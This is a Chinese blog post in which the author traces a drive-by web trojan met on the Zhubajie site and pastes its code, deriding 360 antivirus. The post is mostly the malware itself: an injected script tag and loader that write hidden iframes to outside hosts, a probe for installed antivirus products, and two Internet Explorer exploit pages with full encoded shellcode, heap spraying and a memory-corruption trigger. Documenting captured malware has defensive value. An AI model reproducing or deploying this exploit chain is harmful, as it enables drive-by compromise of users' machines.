抓到一只网马，发文顺便鄙视下360

访问猪八戒网抓到一只马儿，具体不清楚是猪八戒被挂马还是内网在arp，

由于阿根廷的出局没心情做分析，只贴上马儿的代码做个记录，顺便鄙视下垃圾的360 ，居然没任何反应，

----------------------------------以下为简单的追踪马儿以及马儿代码部分

访问猪八戒某页面返回信息：

1

<script language=javascript src= http://z%63C.r%72.%6Eu/tj.js></script>                                                                                                                                                                                                                                 {"t":"0","msg":"<p>\u6b64\u7a3f\u4ef6\u5df2\u7ecf\u4e2d\u6807,\u4e0d\u80fd\u518d\u6295\u7968.<\/p>"}

 

追踪http://z%63C.r%72.%6Eu/tj.js   ，鄙视下，连url都搞加密，有个屁用

Title

1. function Get(){
   
2. var Then = new Date() 
   
3. Then.setTime(Then.getTime() + 12*60*60*1000)
   
4. var cookieString = new String(document.cookie)
   
5. var cookieHeader = "Cookie1=" 
   
6. var beginPosition = cookieString.indexOf(cookieHeader)
   
7. if (beginPosition != -1){ 
   
8. } else 
   
9. {
   
10. var bvv="tv";
    
11. document.cookie = "Cookie1=cacc;expires="+ Then.toGMTString()
    
12. document.write("<div style=\'dispaly:none;\' >");
    
13. document.write("<ifra"+"me src=http:\/\/aqe.2288.org\/11\/336fe.htm width=100 height=0><\/iframe>");
    
14. document.write("</div>");
    
15. }
    
16. }Get();

 

内嵌了一个网页  ttp:\/\/aqe.2288.org\/11\/336fe.htm  ，继续追踪之

Title

1. 
   
2. <HTML> 
   
3. <SCRIPT LANGUAGE="JavaScript"> 
   
4. <!-- Hide 
   
5. function killErrors() { 
   
6. return true; 
   
7. }
   
8. window.onerror = killErrors;
   
9. function jc()
   
10. {
    
11. jc_list = ['res://C:\\Program%20Files\\Rising\\Rav\\rssafety.exe/PNG/123','res://D:\\Program%20Files\\Rising\\Rav\\rssafety.exe/PNG/123','res://E:\\Program%20Files\\Rising\\Rav\\rssafety.exe/PNG/123','res://C:\\Program%20Files\\360\\360Safe\\safemon\\loadwdui.dll/PNG/130','res://D:\\program%20files\\360safe\\safemon\\loadwdui.dll/PNG/130','res://D:\\360safe\\safemon\\loadwdui.dll/PNG/130','res://C:\\360safe\\safemon\\loadwdui.dll/PNG/130','res://E:\\program%20files\\360safe\\safemon\\loadwdui.dll/PNG/130','res://C:\\program%20files\\360safe\\safemon\\loadwdui.dll/PNG/130','res://D:\\Program%20Files\\360\\360Safe\\safemon\\loadwdui.dll/PNG/130','res://e:\\Program%20Files\\360\\360Safe\\safemon\\loadwdui.dll/PNG/130','res://f:\\Program%20Files\\360\\360Safe\\safemon\\loadwdui.dll/PNG/130'];
    
12. for ( i= 0; i<jc_list.length; i++)
    
13. {
    
14.         ischeck = 1;
    
15.         x = new Image();
    
16.         x.src = "";
    
17.         x.onerror = function()
    
18.                 {
    
19.                         ischeck = 0;
    
20.                 }
    
21.         x.src = jc_list[i];
    
22.         if (ischeck == 1)
    
23.                 return 1;
    
24.         delete x;
    
25. }
    
26. return 0;
    
27. }
    
28. 
    
29. 
    
30. 
    
31. 
    
32. if (!jc())
    
33. {
    
34. if(navigator.userAgent.toLowerCase().indexOf("msie")>0)
    
35. {
    
36. document.write("<EMBED src=iie.swf width=0 height=0>");
    
37. }
    
38. else
    
39. {
    
40. document.write("<EMBED src=fff.swf width=0 height=0>");
    
41. }
    
42. var yaom="bs";
    
43. document.writeln("<iframe src=av.htm width=100 height=1><\/iframe>");
    
44. }
    
45. else
    
46. {
    
47. document.writeln("<script src=\"2.js\"><\/script>");
    
48. }
    
49. 
    
50. 
    
51. 
    
52. 
    
53. 
    
54. 
    
55. // --> 
    
56. </SCRIPT> 
    
57. </HTML> 
    
58. <script type="text/javascript" src="http://js.tongji.linezing.com/1241363/tongji.js"></script><noscript><a href="http://www.linezing.com"><img src="http://img.tongji.linezing.com/1241363/tongji.gif"/></a></noscript>
59. 　　

   好一个乖乖，一眼居然没看懂，先不管，继续追踪出真实的马儿在说

在看下面又嵌入了：
if (!jc())
{
if(navigator.userAgent.toLowerCase().indexOf("msie")>0)
{
document.write("<EMBED src=iie.swf width=0 height=0>");
}
else
{
document.write("<EMBED src=fff.swf width=0 height=0>");
}
var yaom="bs";
document.writeln("<iframe src=av.htm width=100 height=1><\/iframe>");
}
else
{
document.writeln("<script src=\"2.js\"><\/script>");
}

swf文件我就不看了，继续看下av.htm 文件， 

Title

1. load......
   
2. <script> 
   
3. if(navigator.userAgent.toLowerCase().indexOf("\x6D\x73"+"\x69\x65\x20\x36")>1)
   
4. {
   
5. document.write("<iframe width=100 height=1 src=6.htm></iframe>");
   
6. }
   
7. if(navigator.userAgent.toLowerCase().indexOf("\x6D\x73"+"\x69\x65\x20\x37")>1)
   
8. {
   
9. document.write("<iframe width=100 height=1 src=7.htm></iframe>");
   
10. }
    
11. 
    
12. </script>

 

马儿终于出来了，继续把2。js文件也看下

1. // JavaScript Document
   
2. <!--
   
3. var u = "6BF52A52-394A-11D3-B153-00C04F79FAA6";
   
4. 
   
5. function ext()          //在关闭IE窗口的时候弹出
   
6. {
   
7. if(window.event.clientY<132 || altKey) iie.launchURL(popURL);
   
8. }
   
9. 
   
10. function brs()       //插入Object
    
11. {
    
12. document.body.innerHTML+="<object id=iie width=0 height=0 classid='CLSID:"+u+"'></object>";
    
13. }
    
14. 
    
15. 
    
16. var popURL = 'safe/360safe.html';    //这里修改成你的退弹网址
    
17. 
    
18. eval("window.attachEvent('onload',brs);");
    
19. eval("window.attachEvent('onunload',ext);");
    
20. 
    
21. 
    
22. //-->

 

 这个js应该是在马儿安装后做操作的，反应我很菜，糊涂之下也分析不来， 那就继续把 2只马儿的代码追出来

<html> 
<body> 
<script> 
var qicheren='\x30';
</script> 
<button id="BIANXINGJINGGANG" onclick="dahuangfeng();" STYLE="DISPLAY:NONE"></button> 
<script src="ie.jpg"></script> 
<script src="iee.jpg"></script> 
<script language="javascript"> 
var dugujiujian = nndx+'%u'+'5858'+'%u5858%u10EB%u4B5B%uC933%uB966%u03B8%u3480%uBD0B%uFAE2%u05EB%uEBE8%uFFFF%u54FF%uBEA3%uBDBD%uD9E2%u8D1C%uBDBD%u36BD%uB1FD%uCD36'+'%u10A1%uD536%u36B5%uD74A%uE4AC%u0355%uBDBF%u2DBD%u455F%u8ED5%uBD8F%uD5BD%uCEE8%uCFD8%u36E9%uB1FB%u0355%uBDBC%u36BD%uD755'+'%uE4B8%u2355%uBDBF%u5FBD%uD544%uD3D2%uBDBD%uC8D5%uD1CF%uE9D0%uAB42%u7D38%uAEC8%uD2D5%uBDD3%uD5BD%uCFC8%uD0D1%u36E9%uB1FB'+'%u3355%uBDBC%u36BD%uD755%uE4BC%uD355%uBDBF%u5FBD%uD544%u8ED1%uBD8F%uCED5%uD8D5%uE9D1%uFB36%u55B1%uBCD2%uBDBD%u5536%uBCD7'+'%u55E4%uBFF2%uBDBD%u445F%u513C%uBCBD%uBDBD%u6136%u7E3C%uBD3D%uBDBD%uBDD7%uA7D7%uD7EE%u42BD%uE1EB%u7D8E%u3DFD%uBE81%uC8BD%u7A44%uBEB9%uDEE1%uD893%uF97A%uB9BE%uD8C5%uBDBD%u748E%uECEC%uEAEE%u8EEC%u367D%uE5FB%u9F55%uBDBC%u3EBD%uBD45%u1E54%uBDBD%u2DBD%uBDD7%uBDD7'+'%uBED7%uBDD7%uBFD7%uBDD5%uBDBD%uEE7D%uFB36%u5599%uBCBC%uBDBD%uFB34%uD7DD%uEDBD%uEB42%u3495%uD9FB%uFB36%uD7DD%uD7BD%uD7BD'+'%uD7BD%uD7B9%uEDBD%uEB42%uD791%uD7BD%uD7BD%uD5BD%uBDA2%uBDB2%u42ED%u81EB%uFB34%u36C5%uD9F3%uC13D%u42B5%uC909%u3DB1%uB5C1'+'%uBD42%uB8C9%uC93D%u42B5%u5F09%u3456%u3D3B%uBDBD%u7ABD%uCDFB%uBDBD%uBDBD%uFB7A%uBDC9%uBDBD%uD7BD%uD7BD%uD7BD%u36BD%uDDFB'+'%u42ED%u85EB%u3B36%uBD3D%uBDBD%uBDD7%uF330%uECC9%uCB42%uEDCD%uCB42%u42DD%u8DEB%uCB42%u42DD%u89EB%uCB42%u42C5%uFDEB%u4636'+'%u7D8E%u668E%u513C%uBFBD%uBDBD%u7136%u453E%uC0E9%u34B5%uBCA1%u7D3E%u56B9%u364E%u3671%u3E64%uAD7E%u7D8E%uECED%uEDEE%uEDED'+'%uEDED%uEAED%uEDED%uEB42%u36B5%uE9C3%uAD55%uBDBC%u55BD%uBDD8%uBDBD%uDED5%uCACB%uD5BD%uD5CE%uD2D9%u36E9%uB1FB%u9955%uBDBD'+'%u34BD%u81FB%u1CD9%uBDB9%uBDBD%u1D30%u42DD%u4242%uD8D7%uCB42%u3681%uADFB%uB555%uBDBD%u8EBD%uEE66%uEEEE%u42EE%u3D6D%u5585'+'%u853D%uC854%u3CAC%uB8C5%u2D2D%u2D2D%uB5C9%u4236%u36E8%u3051%uB8FD%u5D42%u1B55%uBDBD%u7EBD%u1D55%uBDBD%u05BD%uBCAC%u3DB9'+'%uB17F%u55BD%uBD2E%uBDBD%u513C%uBCBD%uBDBD%u4136%u7A3E%u7AB9%u8FBA%u2CC9%u7AB1%uB9FA%u34DE%uF26C%uFA7A%u1DB5%u2AD8%u7A76'+'%uB1FA%uFDEC%uC207%uFA7A%u83AD%u0BA0%u7A84%uA9FA%uD405%uA669%uFA7A%u03A5%uDBC2%u7A1D%uA1FA%u1441%u108A%uFA7A%u259D%uADB7'+'%uD945%u8D1C%uBDBD%u36BD%uB1FD%uCD36%u10A1%uD536%u36B5%uD74A%uE4B9%uE955%uBDBD%u2DBD%u455F%u8ED5%uBD8F%uD5BD%uCEE8%uCFD8'+'%u36E9%u55BB%u42E8%u4242%u5536%uB8D7%u55E4%uBD88%uBDBD%u445F%u428E%u42EA%uB9EB%uBF56%u7EE5%u4455%u4242%uE642%uBA7B%u3405'+'%uBCE2%u7ADB%uB8FA%u5D42%uEE7E%u6136%uD7EE%uD5FD%uADBD%uBDBD%u36EA%u9DFB%uA555%u4242%uE542%uEC7E%u36EB%u81C8%uC936%uC593'+'%u48BE%u36EB%u9DCB%u48BE%u748E%uFCF4%uBE10%u8E78%uB266%uAD03%u6B87%uB5C9%u767C%uBEBA%uFD67%u4C56%uA286'+'%u5AC8%u36E3%u99E3%u60BE%u36DB%uF6B1%uE336%uBEA1%u3660%u36B9%u78BE%uE316%u7EE4%u6055%u4241%u0F42%u5F4F%u8449%uC05F%u673E'+jiandao;
         var qingtianzhu = shenzhanshi(dugujiujian);        
         var conglaiyebuqi = new Array()
         var youyitian = 0x86000 - qingtianzhu.length*2;
         var woxinxuelaichao = nicxa+"0c0"+"c"+nicxa+"0c0"+"c";
         var kuaishiyongshuangjiegun = shenzhanshi(woxinxuelaichao);
    
        while(kuaishiyongshuangjiegun.length < youyitian/2) kuaishiyongshuangjiegun +=kuaishiyongshuangjiegun;
         var pp = kuaishiyongshuangjiegun.substring(0, youyitian/2);
         delete kuaishiyongshuangjiegun;
         for(i=0;i<270;i++) 
         {
              conglaiyebuqi[i] = pp+pp+qingtianzhu;    
         } 

         
function dahuangfeng()
{
    var hongzhizhu = document.createElement("BODY");
    var sa="b";
    hongzhizhu.addBehavior(baibianxionshi);
    var tt="a";
    document.appendChild(hongzhizhu);
    try
    {
        for (i=0;i<10;i++)
         {
           hongzhizhu.setAttribute('s',window);
        }
    }
    catch(e)
    {}
    var a="s";
    window.status+='';
}
document.getElementById("BIANXINGJINGGANG").onclick();
</script> 
</body> 
</html>

<html> 
<script> 
var qicheren='\x30';
</script> 
<script src="ie.jpg"></script> 
<script src="iee.jpg"></script> 
<script src="ieee.jpg"></script> 
<script language="JavaScript"> 
a=nndx+'%u'+'5858'+'%u5858%u10EB%u4B5B%uC933%uB966%u03B8%u3480%uBD0B%uFAE2%u05EB%uEBE8%uFFFF%u54FF%uBEA3%uBDBD%uD9E2%u8D1C%uBDBD%u36BD%uB1FD%uCD36'+'%u10A1%uD536%u36B5%uD74A%uE4AC%u0355%uBDBF%u2DBD%u455F%u8ED5%uBD8F%uD5BD%uCEE8%uCFD8%u36E9%uB1FB%u0355%uBDBC%u36BD%uD755'+'%uE4B8%u2355%uBDBF%u5FBD%uD544%uD3D2%uBDBD%uC8D5%uD1CF%uE9D0%uAB42%u7D38%uAEC8%uD2D5%uBDD3%uD5BD%uCFC8%uD0D1%u36E9%uB1FB'+'%u3355%uBDBC%u36BD%uD755%uE4BC%uD355%uBDBF%u5FBD%uD544%u8ED1%uBD8F%uCED5%uD8D5%uE9D1%uFB36%u55B1%uBCD2%uBDBD%u5536%uBCD7'+'%u55E4%uBFF2%uBDBD%u445F%u513C%uBCBD%uBDBD%u6136%u7E3C%uBD3D%uBDBD%uBDD7%uA7D7%uD7EE%u42BD%uE1EB%u7D8E%u3DFD%uBE81%uC8BD%u7A44%uBEB9%uDEE1%uD893%uF97A%uB9BE%uD8C5%uBDBD%u748E%uECEC%uEAEE%u8EEC%u367D%uE5FB%u9F55%uBDBC%u3EBD%uBD45%u1E54%uBDBD%u2DBD%uBDD7%uBDD7'+'%uBED7%uBDD7%uBFD7%uBDD5%uBDBD%uEE7D%uFB36%u5599%uBCBC%uBDBD%uFB34%uD7DD%uEDBD%uEB42%u3495%uD9FB%uFB36%uD7DD%uD7BD%uD7BD'+'%uD7BD%uD7B9%uEDBD%uEB42%uD791%uD7BD%uD7BD%uD5BD%uBDA2%uBDB2%u42ED%u81EB%uFB34%u36C5%uD9F3%uC13D%u42B5%uC909%u3DB1%uB5C1'+'%uBD42%uB8C9%uC93D%u42B5%u5F09%u3456%u3D3B%uBDBD%u7ABD%uCDFB%uBDBD%uBDBD%uFB7A%uBDC9%uBDBD%uD7BD%uD7BD%uD7BD%u36BD%uDDFB'+'%u42ED%u85EB%u3B36%uBD3D%uBDBD%uBDD7%uF330%uECC9%uCB42%uEDCD%uCB42%u42DD%u8DEB%uCB42%u42DD%u89EB%uCB42%u42C5%uFDEB%u4636'+'%u7D8E%u668E%u513C%uBFBD%uBDBD%u7136%u453E%uC0E9%u34B5%uBCA1%u7D3E%u56B9%u364E%u3671%u3E64%uAD7E%u7D8E%uECED%uEDEE%uEDED'+'%uEDED%uEAED%uEDED%uEB42%u36B5%uE9C3%uAD55%uBDBC%u55BD%uBDD8%uBDBD%uDED5%uCACB%uD5BD%uD5CE%uD2D9%u36E9%uB1FB%u9955%uBDBD'+'%u34BD%u81FB%u1CD9%uBDB9%uBDBD%u1D30%u42DD%u4242%uD8D7%uCB42%u3681%uADFB%uB555%uBDBD%u8EBD%uEE66%uEEEE%u42EE%u3D6D%u5585'+'%u853D%uC854%u3CAC%uB8C5%u2D2D%u2D2D%uB5C9%u4236%u36E8%u3051%uB8FD%u5D42%u1B55%uBDBD%u7EBD%u1D55%uBDBD%u05BD%uBCAC%u3DB9'+'%uB17F%u55BD%uBD2E%uBDBD%u513C%uBCBD%uBDBD%u4136%u7A3E%u7AB9%u8FBA%u2CC9%u7AB1%uB9FA%u34DE%uF26C%uFA7A%u1DB5%u2AD8%u7A76'+'%uB1FA%uFDEC%uC207%uFA7A%u83AD%u0BA0%u7A84%uA9FA%uD405%uA669%uFA7A%u03A5%uDBC2%u7A1D%uA1FA%u1441%u108A%uFA7A%u259D%uADB7'+'%uD945%u8D1C%uBDBD%u36BD%uB1FD%uCD36%u10A1%uD536%u36B5%uD74A%uE4B9%uE955%uBDBD%u2DBD%u455F%u8ED5%uBD8F%uD5BD%uCEE8%uCFD8'+'%u36E9%u55BB%u42E8%u4242%u5536%uB8D7%u55E4%uBD88%uBDBD%u445F%u428E%u42EA%uB9EB%uBF56%u7EE5%u4455%u4242%uE642%uBA7B%u3405'+'%uBCE2%u7ADB%uB8FA%u5D42%uEE7E%u6136%uD7EE%uD5FD%uADBD%uBDBD%u36EA%u9DFB%uA555%u4242%uE542%uEC7E%u36EB%u81C8%uC936%uC593'+'%u48BE%u36EB%u9DCB%u48BE%u748E%uFCF4%uBE10%u8E78%uB266%uAD03%u6B87%uB5C9%u767C%uBEBA%uFD67%u4C56%uA286'+'%u5AC8%u36E3%u99E3%u60BE%u36DB%uF6B1%uE336%uBEA1%u3660%u36B9%u78BE%uE316%u7EE4%u6055%u4241%u0F42%u5F4F%u8449%uC05F%u673E'+jiandao;
sh = shenzhanshi(a);
sz = sh.length * 2;
afandaz = 0x1000000-(sz+0x038);
c = "%20c0c%20c0c";

r = c.replace(re, "u");
afanda = shenzhanshi(r);

while (afanda.length*2<afandaz) afanda+=afanda;
szhsen = new Array();
for (i=0;i<8;i++)
{          
           szhsen[i] = afanda+sh;
}

CollectGarbage();

</script> 

<script language="JavaScript"> 

var asb = new Array();
for(var i = 0; i < 500; i++) {
        asb.push(document.createElement("img"));
}
  


</script> 
<body onload="test();"></body> 
</html>

 还加密的呢，NND,那就先放着，等看完西班牙的比赛，睡一觉了在慢慢给你开刀！